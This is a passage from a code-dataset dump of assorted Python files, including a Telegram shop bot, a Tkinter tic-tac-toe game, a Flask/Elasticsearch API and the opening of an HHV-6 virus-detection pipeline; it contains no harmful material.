,op_kw,op_code,op_mopid],['id','name','keywords','code_string','master_id']):\r\n operations[key] =[extractor(i) for i in range(mat_file['Operations'].shape[0])]\r\n else:\r\n with open(op_path,'r') as f:\r\n reader = csv.reader(f)\r\n op = []\r\n for row in reader:\r\n op.append(row)\r\n del op[0]\r\n op_id = lambda i : int(op[i][3])\r\n op_name = lambda i : str(op[i][1])\r\n op_code = lambda i : str(op[i][0])\r\n op_mopid = lambda i : int(op[i][4])\r\n op_kw = lambda i : str(op[i][2])\r\n for extractor,key in zip([op_id,op_name,op_kw,op_code,op_mopid],['id','name','keywords','code_string','master_id']):\r\n operations[key] =[extractor(i) for i in range(len(op))]\r\n retval = retval + (operations,)\r\n\r\n if item == 'TS_DataMat':\r\n if LTv7_3:\r\n raise ValueError(\"Not Implemented yet\")\r\n else:\r\n path_pattern = inputDir + '{:s}/hctsa_datamatrix.csv'\r\n mat_file_path = path_pattern.format(task_name)\r\n with open(mat_file_path,'r') as f:\r\n reader = csv.reader(f)\r\n mat_file = []\r\n for row in reader:\r\n mat_file.append([float(elem) for elem in row])\r\n retval = retval + (mat_file,)\r\n\r\n if item == 'MasterOperations':\r\n path_pattern = inputDir+'{:s}/hctsa_masterfeatures.csv'\r\n m_op_path = path_pattern.format(task_name)\r\n m_operations = dict()\r\n if is_from_old_matlab:\r\n raise NameError('Don''t know how to get MasterOperations from old Matlab version.')\r\n elif not is_from_old_matlab and LTv7_3:\r\n # lambda function used to populate the dictionary with the appropriate data lists\r\n m_op_id = lambda i: int(mat_file['MasterOperations'][i][0][2][0][0])\r\n m_op_name = lambda i: str(mat_file['MasterOperations'][i][0][1][0])\r\n for extractor, key in zip([m_op_id, m_op_name],\r\n ['id', 'name']):\r\n m_operations[key] = [extractor(i) for i in range(mat_file['MasterOperations'].shape[0])]\r\n else:\r\n with open(m_op_path,'r') as f:\r\n reader = csv.reader(f)\r\n m_op = []\r\n for row in reader:\r\n m_op.append(row)\r\n del m_op[0]\r\n m_op_id = lambda i: int(m_op[i][2])\r\n m_op_name = lambda i: str(m_op[i][1])\r\n for extractor, key in zip([m_op_id, m_op_name],\r\n ['id', 'name']):\r\n m_operations[key] = [extractor(i) for i in range(len(m_op))]\r\n retval = retval + (m_operations,)\r\n\r\n return retval\r\n","sub_path":"op_importance/workflow_classes/modules/misc/PK_matlab_IO.py","file_name":"PK_matlab_IO.py","file_ext":"py","file_size_in_byte":10762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"325620664","text":"f = open(\"day1test2.txt\", 'r')\ni = 1\np = 0\nfor c in f.read():\n\tif c == '(':\n\t\ti = i+1\n\telse:\n\t\ti = i-1\n\tp = p+1\n\tif i<=0:\n\t\tbreak\n\nf.close()\nprint(p)\n","sub_path":"day1_p2.py","file_name":"day1_p2.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"473494219","text":"from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ReplyKeyboardMarkup\r\nimport telegram\r\nfrom maxsulot import *\r\nimport json\r\nimport ast\r\n\r\n# Kraska\r\ndef Kraskalar(query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska:\r\n a={'fun':'Rangi', 'index':count}\r\n a=json.dumps(a)\r\n button=[InlineKeyboardButton(i['Nomi'], callback_data=a)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizning maxsulotlardan istaganingizni tanlang va buyurtma bering. \\n <b>Barch maxsulotlar:</b>', reply_markup=buttons)\r\n# Rangi\r\ndef Ranglar(a, query):\r\n buttons=[]\r\n count=0\r\n print(Kraska[int(a)]['img'])\r\n for i in Kraska[a]['Rangi']:\r\n fun={'fun':'Kg', 'index':a, 'rang':i}\r\n print(i)\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(Rang[i], callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_photo(photo=open(Kraska[int(a)]['img'], 'rb'), caption='📌 \\nIltimos tanlagan maxsulotingiz rangini kiriting. \\n <b>Maxsulotning bizda mavjut ranglari:</b>', parse_mode='HTML', reply_markup=buttons)\r\n\r\n# Kg\r\ndef Kglar(a, query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska[a]['Kg']:\r\n fun={'fun':'Narxi', 'index':a, 'kg':i}\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(str(Kg[i])+' Kg', callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizda siz tanlagan maxsulotning sifativa kilogramiga qarab quyidagi narxlari mavjut. \\n <b>Maxsulotning bizda mavjut ranglari:</b>', reply_markup=buttons)\r\n\r\n# Narxi\r\ndef Narxlar(a, query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska[a]['Narxi']:\r\n fun={'fun':'Soni', 'index':a, 'narx':i}\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(str(Narx[i])+\" so'm/dona\", callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizda siz tanlagan maxsulotning sifativa kilogramiga qarab quyidagi narxlari mavjut. \\n <b>Maxsulotning bizda mavjut ranglari:</b>', reply_markup=buttons)\r\n\r\n\r\n\r\ndef Sonlar(a, query):\r\n buttons=[]\r\n count=0\r\n for i in Kraska[a]['Soni']:\r\n fun={'fun':'Count', 'soni':Soni[count]}\r\n fun=json.dumps(fun)\r\n button=[InlineKeyboardButton(Soni[i], callback_data=fun)]\r\n buttons.append(button)\r\n count+=1\r\n buttons=InlineKeyboardMarkup(buttons)\r\n query.message.reply_html('📌 \\nBizda siz tanlagan maxsulotning sifativa kilogramiga qarab quyidagi narxlari mavjut. \\n <b>Maxsulotning bizda mavjut ranglari:</b>', reply_markup=buttons)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"277052613","text":"from tkinter import *\nfrom tkinter import ttk\nimport os\nfrom copy import deepcopy\nimport time\nimport random\n\nclass Field:\n def __init__(self, root_window, pos_x, pos_y, blank, circle, cross, parent):\n self.root = root_window\n self.x = pos_x\n self.y = pos_y\n \n self.parent = parent\n self.owner = None\n\n #to do obrazków muszą to być PhotoImage\n self.blank = blank\n self.circle = circle\n self.cross = cross\n\n self.label = Label(self.root, borderwidth = 2, background = 'black')\n self.label['image'] = blank\n self.label.grid(column = self.x, row = self.y)\n self.label.bind('<Button-1>', self.clicked)\n\n def unbind(self):\n self.label.unbind('<Button-1>')\n\n def clicked(self, event):\n if self.parent.player == 'player':\n self.unbind()\n self.label['image'] = self.cross\n self.root.update_idletasks()\n self.owner = 'player'\n self.parent.player_click(tuple(self))\n \n def __iter__(self):\n yield self.x\n yield self.y\n\n def computer_click(self):\n if self.parent.player == 'computer':\n self.unbind()\n self.owner = 'computer'\n self.label['image'] = self.circle\n\nclass Game:\n base_folder = os.path.dirname(__file__)\n def __init__(self):\n self.player = 'player'\n self.root = Tk()\n\n self.blank = PhotoImage(file=os.path.join(Game.base_folder, 'blank.gif'))\n self.circle = PhotoImage(file=os.path.join(Game.base_folder, 'circle.gif'))\n self.cross = PhotoImage(file=os.path.join(Game.base_folder, 'cross.gif'))\n\n self.root.geometry(\"200x100\")\n self.root.title('Tic Tac Toe')\n\n self.info_label = Label(self.root, text='Tic Tac Toe')\n self.info_label.pack(side=TOP, pady = 10)\n self.start_button = ttk.Button(self.root, text='START')\n self.start_button.pack(side=BOTTOM, pady = 10)\n\n self.start_button.bind('<Button-1>', self.make_board)\n \n self.root.mainloop()\n\n def make_board(self, event):\n self.root.withdraw()\n self.game_frame = Toplevel()\n self.game_frame.protocol(\"WM_DELETE_WINDOW\", self.close_game_frame)\n self.game_frame.title('Tic Tac Toe')\n self.start_game()\n\n def start_game(self):\n self.tiles = dict()\n for y in range(3):\n for x in range(3):\n self.tiles[(x, y)] = Field(self.game_frame, x, y, self.blank, self.circle, self.cross, self)\n \n self.av_tiles_pos = list(self.tiles.keys())\n self.player = 'player'\n # print(self.av_tiles_pos)\n\n def close_game_frame(self):\n self.game_frame.destroy()\n self.root.destroy()\n\n def player_click(self, who_clicked):\n try:\n self.av_tiles_pos.remove(who_clicked)\n except:\n pass\n # print(who_clicked, self.av_tiles_pos)\n self.player = 'computer'\n if not (self.check() == True):\n time.sleep(0.5)\n self.computer_turn()\n else:\n self.end_game()\n\n def computer_turn(self):\n try:\n computer_choice = random.choice(self.av_tiles_pos)\n self.av_tiles_pos.remove(computer_choice)\n self.tiles[computer_choice].computer_click()\n self.player = 'player'\n except:\n pass\n if self.check() == True:\n for elem in self.av_tiles_pos:\n self.tiles[elem].unbind()\n self.end_game()\n\n def check(self):\n if len(self.av_tiles_pos) >= 0:\n # vertical stripes\n # x00|x00|x00\n if self.tiles[(0,0)].owner == self.tiles[(0,1)].owner == self.tiles[(0,2)].owner:\n if self.tiles[(0,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 0x0|0x0|0x0\n if self.tiles[(1,0)].owner == self.tiles[(1,1)].owner == self.tiles[(1,2)].owner:\n if self.tiles[(1,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(1,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 00x|00x|00x\n if self.tiles[(2,0)].owner == self.tiles[(2,1)].owner == self.tiles[(2,2)].owner:\n if self.tiles[(2,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(2,0)].owner == 'computer':\n self.winner('computer')\n return True\n # horizontal stripes\n # xxx|000|000\n if self.tiles[(0,0)].owner == self.tiles[(1,0)].owner == self.tiles[(2,0)].owner:\n if self.tiles[(0,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 000|xxx|000\n if self.tiles[(0,1)].owner == self.tiles[(1,1)].owner == self.tiles[(2,1)].owner:\n if self.tiles[(0,1)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,1)].owner == 'computer':\n self.winner('computer')\n return True\n # 000|000|xxx\n if self.tiles[(0,2)].owner == self.tiles[(1,2)].owner == self.tiles[(2,2)].owner:\n if self.tiles[(0,2)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,2)].owner == 'computer':\n self.winner('computer')\n return True\n # special stripes\n # x00|0x0|00x\n if self.tiles[(0,0)].owner == self.tiles[(1,1)].owner == self.tiles[(2,2)].owner:\n if self.tiles[(0,0)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,0)].owner == 'computer':\n self.winner('computer')\n return True\n # 00x|0x0|x00\n if self.tiles[(0,2)].owner == self.tiles[(1,1)].owner == self.tiles[(2,0)].owner:\n if self.tiles[(0,2)].owner == 'player':\n self.winner('player')\n return True\n elif self.tiles[(0,2)].owner == 'computer':\n self.winner('computer')\n return True\n \n if len(self.av_tiles_pos) == 0:\n self.winner('tie')\n return True\n \n def winner(self, winner):\n self.txt = ''\n if winner == 'player':\n self.txt = 'You won!'\n elif winner == 'computer':\n self.txt = 'Computer won!'\n elif winner == 'tie':\n self.txt = \"It's a tie\"\n \n def end_game(self):\n def onclose(event=None):\n self.popup.destroy()\n self.start_game()\n \n self.popup = Toplevel()\n self.popup.title('Game ends')\n self.popup.geometry(\"200x100\")\n self.info_pop = Label(self.popup, text = self.txt)\n self.info_pop.pack(pady = 10)\n self.info_button = Button(self.popup, text='Okay')\n self.info_button.pack(side=BOTTOM, pady=10)\n self.popup.protocol(\"WM_DELETE_WINDOW\", onclose)\n self.info_button.bind('<Button-1>', onclose)\n\nif __name__ == '__main__':\n Game()","sub_path":"tictactoe/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":7801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"521375607","text":"import numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom csv import reader\nimport re\nfrom sklearn.preprocessing import LabelEncoder\n\nclass obtainDNAData():\n def __init__(self, directory):\n self.dataset_directory = directory\n self.label_encoder = LabelEncoder()\n self.label_encoder.fit(np.array(['a','c','g','t']))\n\n def special_match(self, strg, search=re.compile(r'[^atcgATCG]').search):\n return not bool(search(strg))\n\n def one_hot_encoder(self, my_array):\n integer_encoded = self.label_encoder.transform(my_array)\n onehot_encoder = OneHotEncoder(categories=[range(5)], sparse=False, dtype=int)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n onehot_encoded = np.delete(onehot_encoded, -1, 1)\n return onehot_encoded\n\n #Returns train_data, test_data\n def obtainData(self):\n\n # open file in read mode\n with open(self.dataset_directory, 'r') as read_obj:\n # pass the file object to reader() to get the reader object\n csv_reader = reader(read_obj)\n # Iterate over each row in the csv using reader object\n dataset_no_repeats = set()\n for row in csv_reader:\n if (self.special_match(row[2])):\n dataset_no_repeats.add(row[2].lower())\n # dataset_no_repeats = list(dataset_no_repeats)[:len(dataset_no_repeats)//5]\n dataset_no_repeats = list(dataset_no_repeats)[:2]\n print(len(dataset_no_repeats))\n # print(len(dataset_no_repeats))\n max = 0\n # A = np.pad(np.array([[0,1,0,0],[1,0,0,0]]), ((0,4-s.shape[0]),(0,0)), mode='constant')\n for i in dataset_no_repeats:\n if len(i) > max:\n max = len(i)\n data = []\n for i in dataset_no_repeats:\n arr = self.one_hot_encoder(np.array(list(i)))\n arr = np.pad(arr, ((0,max-arr.shape[0]),(0,0)), mode='constant')\n data.append(arr)\n\n test_index = round(len(data) * 0.9)\n return np.array(data[0:test_index]), np.array(data[test_index:])\n","sub_path":"VAEs/generate_dna_onehot.py","file_name":"generate_dna_onehot.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"242114164","text":"value = input()\nmodified_value = input()\nk = int(input())\nsame_value = []\nlength = len(value) if len(value) < len(modified_value) else len(modified_value) \nl = len(value) + len(modified_value)\nfor i in range(length):\n if value[i] != modified_value[i]:\n break\n same_value.append(i)\ni = len(same_value)\nprint(( \"Yes\" if l<= k+i*2 and l%2 == k%2 or l < k else \"No\"))\nprint(l)\n\n\n# logic here \n\n# we add the both strings length \n# and check the \n\n# here i is the same value in both strings\n# value + modified_value , k + i*2 \n\n# so simple mean the k is opreation which perform on string or we can say if you perform one more action for remove or you\n# can't. then you have perform an action this must be add in your action \n\n# then k is may be extra compare the visible changes \n\n# so the login is \n\n# l <= k + i*2 or l < k\n\n# we add one condition like \n# l%2 == k%2 or l < k \n# for this like question\n# y \n# yu\n# 2\n# Yes \n\n# that's ansewer No but give yes beacuse we don't k == len(both)\n\n\n\n","sub_path":"append_delete.py","file_name":"append_delete.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"474022690","text":"import pygame\r\nfrom pygame.locals import *\r\nimport rawinputreader\r\n\r\nclass MousePointer(pygame.sprite.Sprite):\r\n \"\"\"This is our snake that will move around the screen\"\"\"\r\n def __init__(self, x, y):\r\n pygame.sprite.Sprite.__init__(self) \r\n try:\r\n self.image = pygame.image.load('mouse_pointer.png').convert_alpha()\r\n except pygame.error as message:\r\n self.image = pygame.Surface((10, 10), SRCALPHA).convert_alpha()\r\n self.image.fill((0xff, 0, 0, 0xff))\r\n self.rect = self.image.get_rect()\r\n self.rect.move_ip(x, y)\r\n\r\npygame.init()\r\n\r\ndisplay_flags = 0*DOUBLEBUF | 1*FULLSCREEN | HWSURFACE\r\nwidth, height = pygame.display.list_modes()[0] \r\n\r\nscreen = pygame.display.set_mode((width, height), display_flags)\r\npygame.mouse.set_visible(False)\r\n\r\nid2mice = {}\r\n\r\nmouse_sprites = pygame.sprite.RenderUpdates()\r\n\r\nbackground = pygame.Surface(screen.get_size())\r\nbackground = background.convert()\r\nbackground.fill((32,32,64))\r\n\r\nscreen.blit(background, (0, 0))\r\npygame.display.update()\r\n\r\nclock = pygame.time.Clock()\r\n\r\nrir = rawinputreader.rawinputreader()\r\n\r\nrun = True\r\nwhile run:\r\n\r\n events = pygame.event.get()\r\n\r\n for event in events:\r\n if (event.type == QUIT or \r\n (event.type == KEYDOWN and event.key in [K_ESCAPE, K_q])):\r\n run = False\r\n\r\n rir_events = rir.pollEvents()\r\n for rir_event in rir_events:\r\n (id, \r\n usflags, ulbuttons, usbuttonflags, usbuttondata, ulrawbuttons, \r\n x, y, extra) = rir_event\r\n button_event = rawinputreader.eventTupleToButton(rir_event)\r\n if not id in id2mice:\r\n mouse = MousePointer(width/2, height/2)\r\n id2mice[id] = mouse\r\n mouse_sprites.add(mouse)\r\n else:\r\n mouse = id2mice[id]\r\n button_action, button = button_event\r\n if button_action != (rawinputreader.NO_BUTTON):\r\n print(button_event)\r\n mouse.rect.move_ip(x, y)\r\n mouse.rect.clamp_ip(screen.get_rect())\r\n\r\n mouse_sprites.clear(screen, background)\r\n mouse_sprites.update() # Calls update on all sprites\r\n dirty = mouse_sprites.draw(screen)\r\n pygame.display.update(dirty)\r\n\r\n clock.tick(40)\r\n\r\nrir.stop() # Must currently be called before ending program :-(\r\n\r\n","sub_path":"pygamedemo.py","file_name":"pygamedemo.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"318947468","text":"#!/usr/bin/env python\n\"\"\"\nAPI bootstrap file\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport logging\nfrom flask import Flask, jsonify, g\nfrom flask.ext.login import LoginManager, current_user\nfrom elasticsearch import Elasticsearch\n\nsys.path.insert(0, os.path.dirname(\n os.path.realpath(__file__)) + '/../../../../lib')\n\nfrom example.v1.lib.user import User\n\nAPP_SECRET_KEY = os.urandom(32)\n\nlogger = logging.getLogger(__name__)\n\nlogin_manager = LoginManager()\n\n#ELASTICSEARCH_HOST = '127.0.0.1'\n#ELASTICSEARCH_PORT = 9200\n\n@login_manager.user_loader\ndef load_user(email_address):\n try:\n user = User(email_address=email_address)\n except ValueError as error:\n message = str(error)\n logger.warn(message)\n return None\n data = {}\n try:\n data = g.db_client.get('example', user.key)\n except (TransportError, Exception) as error:\n if not getattr(error, 'status_code', None) == 404:\n logger.critical(str(error))\n return None\n if not data.get('found', None):\n message = \"'%s' does not exist.\" % email_address\n logger.warn(message)\n return None\n user.set_values(values=data['_source'])\n return user\n\n\ndef connect_db():\n \"\"\" connect to couchbase \"\"\"\n try:\n db_client = Elasticsearch()\n #[{'host': ELASTICSEARCH_HOST, 'port': ELASTICSEARCH_PORT}],\n #use_ssl=True,)\n #sniff_on_connection_fail=True,)\n except Exception as error:\n logger.critical(error)\n raise\n return db_client\n\n\ndef create_app():\n \"\"\" dynamically create the app \"\"\"\n #app = Flask(__name__, static_url_path='')\n app = Flask(__name__)\n app.config.from_object(__name__)\n app.secret_key = APP_SECRET_KEY\n login_manager.init_app(app)\n\n @app.before_request\n def before_request():\n \"\"\" create the db_client global if it does not exist \"\"\"\n if not hasattr(g, 'db_client'):\n g.db_client = connect_db()\n if not hasattr(g, 'user'):\n g.user = current_user\n\n\n def default_error_handle(error=None):\n \"\"\" create a default json error handle \"\"\"\n return jsonify(error=str(error), message=error.description,\n success=False), error.code\n\n ## handle all errors with json output\n for error in range(400, 420) + range(500, 506):\n app.error_handler_spec[None][error] = default_error_handle\n\n ## add each api Blueprint and create the base route\n from example.v1.api.auth.views import auth\n app.register_blueprint(auth, url_prefix=\"/v1/auth\")\n from example.v1.api.users.views import users\n app.register_blueprint(users, url_prefix=\"/v1/users\")\n from example.v1.api.test.views import test\n app.register_blueprint(test, url_prefix=\"/v1/test\")\n\n return app\n\n\ndef bootstrap(**kwargs):\n \"\"\"bootstraps the application. can handle setup here\"\"\"\n app = create_app()\n app.debug = True\n app.run(host=kwargs['host'], port=kwargs['port'])\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.DEBUG,\n format=(\"%(asctime)s %(levelname)s %(name)s[%(process)s] : %(funcName)s\"\n \" : %(message)s\"),\n #filename='/var/log/AAA/%s.log' % FILE_NAME\n )\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--host\", help=\"Hostname or IP address\", dest=\"host\",\n type=str, default='0.0.0.0')\n parser.add_argument(\"--port\", help=\"Port number\", dest=\"port\", type=int,\n default=8000)\n args = parser.parse_args()\n bootstrap(**args.__dict__)\n","sub_path":"lib/example/v1/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"377929864","text":"#!/usr/bin/env python\n\n'''\nCopyright (c) 2020 RIKEN\nAll Rights Reserved\nSee file LICENSE for details.\n'''\n\n\nimport os,sys,datetime,argparse,glob,logging\n\n\n# version\nversion='2021/April/27'\n\n\n# HHV-6 refseq IDs\nhhv6a_refid='NC_001664.4'\nhhv6b_refid='NC_000898.1'\n\n\n# args\nparser=argparse.ArgumentParser(description='')\nparser.add_argument('-alignmentin', help='Optional. Specify if you use BAM/CRAM file for input. You also need to specify either -b or -c.', action='store_true')\nparser.add_argument('-b', metavar='str', type=str, help='Either -b or -c is Required. Specify input mapped paired-end BAM file.')\nparser.add_argument('-c', metavar='str', type=str, help='Either -b or -c is Required. Specify input mapped paired-end CRAM file.')\nparser.add_argument('-fa', metavar='str', type=str, help='Required. Specify reference genome which are used when input reads were mapped. Example: GRCh38DH.fa')\nparser.add_argument('-use_mate_mapped', help='Optional. Specify if you use unmapped reads with their mate was mapped. Otherwise, only both R1 and R2 unmapped will be used by default.', action='store_true')\nparser.add_argument('-all_discordant', help='Optional. Specify if you use all discordant reads, including not-properly paired reads. Otherwise, only both R1 and R2 unmapped will be used by default.', action='store_true')\nparser.add_argument('-fastqin', help='Optional. Specify if you use unmapped reads for input instead of BAM/CRAM file. You also need to specify -fq1 and -fq2.', action='store_true')\nparser.add_argument('-single', help='Optional. Specify if you use single-end unmapped reads for input instead of BAM/CRAM file. Only works when specifing -fastqin option. You also need to specify -fq1.', action='store_true')\nparser.add_argument('-fq1', metavar='str', type=str, help='Specify unmapped fastq file, read-1 of read pairs.')\nparser.add_argument('-fq2', metavar='str', type=str, help='Specify unmapped fastq file, read-2 of read pairs.')\nparser.add_argument('-ONT_bamin', help='Optional. Specify if you use BAM file with ONT long reads.', action='store_true')\nparser.add_argument('-ONT_bam', help='Optional. Specify BAM file with ONT long reads. This must be position-sorted.')\nparser.add_argument('-ONT_recon_min_depth', metavar='int', type=int, help='Optional. Specify a number (interger) of minimum reads required for local HHV-6 sequence reconstruction.')\nparser.add_argument('-vref', metavar='str', type=str, help='Required. Specify reference of virus genomes, including HHV-6A and B. Example: viral_genomic_200405.fa')\nparser.add_argument('-vrefindex', metavar='str', type=str, help='Required. Specify hisat2 index of virus genomes, including HHV-6A and B. Example: viral_genomic_200405')\nparser.add_argument('-depth', metavar='int', type=int, help='Optional. Average depth of input BAM/CRAM file. Only available when using WGS data. If this option is true, will output virus_read_depth/chromosome_depth as well.')\nparser.add_argument('-bwa', help='Optional. Specify if you use BWA for mapping instead of hisat2.', action='store_true')\nparser.add_argument('-denovo', help='Optional. Specify if you want to perform de-novo assembly.', action='store_true')\nparser.add_argument('-picard', metavar='str', type=str, help='Required. Specify full path to picard.jar. Example: /path/to/picard/picard.jar')\nparser.add_argument('-outdir', metavar='str', type=str, help='Optional. Specify output directory. Default: ./result_out', default='./result_out')\nparser.add_argument('-overwrite', help='Optional. Specify if you overwrite previous results.', action='store_true')\nparser.add_argument('-keep', help='Optional. Specify if you do not want to delete temporary files.', action='store_true')\nparser.add_argument('-p', metavar='int', type=int, help='Optional. Number of threads. 3 or more is recommended. Default: 2', default=2)\nparser.add_argument('-v', '--version', help='Print version.', action='store_true')\nparser.add_argument('-singularity', action='store_true', help=argparse.SUPPRESS)\nparser.add_argument('-remove_chr_with_no_read', action='store_true', help=argparse.SUPPRESS)\nargs=parser.parse_args()\n\n\n# start\nimport init\ninit.init(args, version)\n\n\n# logging\nimport log\nargs.logfilename='for_debug.log'\nif os.path.exists(os.path.join(args.outdir, args.logfilename)) is True:\n os.remove(os.path.join(args.outdir, args.logfilename))\nlog.start_log(args)\nlog.logger.debug('Logging started.')\n\n\n# initial check\nimport initial_check\nprint()\nlog.logger.info('You are using version \"%s\"' % version)\nlog.logger.info('Initial check started.')\ninitial_check.check(args, sys.argv, init.base)\n\n\n# set up\nimport setup\nsetup.setup(args, init.base)\nparams=setup.params\n\n\n# output file names\nimport utils\nfilenames=utils.empclass()\n\nfilenames.discordant_bam =os.path.join(args.outdir, 'discordant.bam')\nfilenames.discordant_sort_bam =os.path.join(args.outdir, 'discordant_sorted.bam')\nfilenames.unmapped_1 =os.path.join(args.outdir, 'unmapped_1.fq')\nfilenames.unmapped_2 =os.path.join(args.outdir, 'unmapped_2.fq')\nfilenames.unmapped_bam_3 =os.path.join(args.outdir, 'unmapped_3.bam')\nfilenames.unmapped_bam_4 =os.path.join(args.outdir, 'unmapped_4.bam')\nfilenames.unmapped_bam_34 =os.path.join(args.outdir, 'unmapped_34.bam')\nfilenames.unmapped_sorted_34 =os.path.join(args.outdir, 'unmapped_34_sorted.bam')\nfilenames.unmapped_3 =os.path.join(args.outdir, 'unmapped_3.fq')\nfilenames.unmapped_4 =os.path.join(args.outdir, 'unmapped_4.fq')\nfilenames.unmapped_merged_pre1=os.path.join(args.outdir, 'unmapped_merged_pre1.fq')\nfilenames.unmapped_merged_pre2=os.path.join(args.outdir, 'unmapped_merged_pre2.fq')\nfilenames.unmapped_merged_1 =os.path.join(args.outdir, 'unmapped_merged_1.fq')\nfilenames.unmapped_merged_2 =os.path.join(args.outdir, 'unmapped_merged_2.fq')\nfilenames.mapped_unsorted_bam =os.path.join(args.outdir, 'mapped_to_virus_orig.bam')\nfilenames.mapped_sorted =os.path.join(args.outdir, 'mapped_to_virus_sorted.bam')\nfilenames.mapped_to_virus_bam =os.path.join(args.outdir, 'mapped_to_virus_dedup.bam')\nfilenames.mapped_to_virus_bai =os.path.join(args.outdir, 'mapped_to_virus_dedup.bai')\nfilenames.markdup_metrix =os.path.join(args.outdir, 'mark_duplicate_metrix.txt')\nfilenames.bedgraph =os.path.join(args.outdir, 'mapped_to_virus.bedgraph')\nfilenames.summary =os.path.join(args.outdir, 'virus_detection_summary.txt')\nfilenames.high_cov_pdf =os.path.join(args.outdir, 'high_coverage_viruses.pdf')\n\nfilenames.tmp_bam =os.path.join(args.outdir, 'tmp.bam')\nfilenames.tmp_sorted_bam =os.path.join(args.outdir, 'tmp_sorted.bam')\nfilenames.tmp_bam_fq1 =os.path.join(args.outdir, 'tmp_bam_1.fq')\nfilenames.tmp_bam_fq2 =os.path.join(args.outdir, 'tmp_bam_2.fq')\nfilenames.tmp_rg_bam =os.path.join(args.outdir, 'tmp_rg.bam')\nfilenames.tmp_fa =os.path.join(args.outdir, 'tmp.fa')\nfilenames.tmp_masked_fa =os.path.join(args.outdir, 'tmp_masked.fa')\nfilenames.tmp_fa_dict =os.path.join(args.outdir, 'tmp.dict')\nfilenames.hhv6a_vcf_gz =os.path.join(args.outdir, 'hhv6a.vcf.gz')\nfilenames.hhv6a_norm_vcf_gz =os.path.join(args.outdir, 'hhv6a_norm.vcf.gz')\nfilenames.hhv6a_gatk_naive =os.path.join(args.outdir, 'hhv6a_reconstructed.fa')\nfilenames.hhv6b_vcf_gz =os.path.join(args.outdir, 'hhv6b.vcf.gz')\nfilenames.hhv6b_norm_vcf_gz =os.path.join(args.outdir, 'hhv6b_norm.vcf.gz')\nfilenames.hhv6b_gatk_naive =os.path.join(args.outdir, 'hhv6b_reconstructed.fa')\nfilenames.hhv6a_metaspades_o =os.path.join(args.outdir, 'hhv6a_metaspades_assembly')\nfilenames.hhv6b_metaspades_o =os.path.join(args.outdir, 'hhv6b_metaspades_assembly')\n\nfilenames.hhv6_dr_ref =os.path.join(init.base, 'lib/HHV6_only_DR.fa')\nfilenames.hhv6_dr_index =os.path.join(init.base, 'lib/hisat2_index/HHV6_only_DR')\nfilenames.mapped_to_dr_bam =os.path.join(args.outdir, 'mapped_to_DR_dedup.bam')\nfilenames.mapped_to_dr_bai =os.path.join(args.outdir, 'mapped_to_DR_dedup.bai')\nfilenames.markdup_metrix_dr =os.path.join(args.outdir, 'mark_duplicate_metrix_DR.txt')\nfilenames.bedgraph_dr =os.path.join(args.outdir, 'mapped_to_DR.bedgraph')\nfilenames.summary_dr =os.path.join(args.outdir, 'mapping_DR_summary.txt')\nfilenames.high_cov_pdf_dr =os.path.join(args.outdir, 'coverage_DR.pdf')\n\nfilenames.hhv6a_dr_vcf_gz =os.path.join(args.outdir, 'hhv6a_DR.vcf.gz')\nfilenames.hhv6a_dr_norm_vcf_gz=os.path.join(args.outdir, 'hhv6a_DR_norm.vcf.gz')\nfilenames.hhv6a_dr_gatk_naive =os.path.join(args.outdir, 'hhv6a_DR_reconstructed.fa')\nfilenames.hhv6b_dr_vcf_gz =os.path.join(args.outdir, 'hhv6b_DR.vcf.gz')\nfilenames.hhv6b_dr_norm_vcf_gz=os.path.join(args.outdir, 